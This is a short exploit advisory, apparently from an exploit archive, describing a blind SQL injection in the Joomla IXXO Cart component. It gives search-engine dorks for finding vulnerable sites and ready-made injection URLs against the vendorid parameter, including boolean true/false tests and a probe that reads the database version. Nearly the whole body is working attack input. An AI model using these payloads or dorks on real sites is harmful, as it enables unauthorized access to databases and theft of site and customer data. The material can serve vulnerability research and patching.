Joomla Component com_ixxocar Blind Sql Injection Vulnerability

==============================================================
Joomla Component com_ixxocar Blind Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : Joomla components {IXXO Cart ecommerce}
.:. Bug Type : Blind Sql Injection
.:. Dork : [1] "Powered by IXXO Cart ecommerce for Joomla"
[2] inurl:"com_ixxocar"

####################################################################

===[ Exploit ]===

www.site.com/path/index.php?option=com_ixxocart&Itemid=2&p=product&id=3&parent=1&vendorid=2[Blind Injection]


www.site.com/path/index.php?option=com_ixxocart&Itemid=2&p=product&id=3&parent=1&vendorid=2+and+1=1 >>> True {Page Is Complete}
www.site.com/path/index.php?option=com_ixxocart&Itemid=2&p=product&id=3&parent=1&vendorid=2+and+1=2 >>> False{Page Is Not Complete}

www.site.com/path/index.php?option=com_ixxocart&Itemid=2&p=product&id=3&parent=1&vendorid=2+and+substring(@@version,1,1)=5 >>> True {Page Is Complete}
www.site.com/path/index.php?option=com_ixxocart&Itemid=2&p=product&id=3&parent=1&vendorid=2+and+substring(@@version,1,1)=4 >>> False{Page Is Not Complete}


####################################################################



#  0day.today [2018-03-19]  #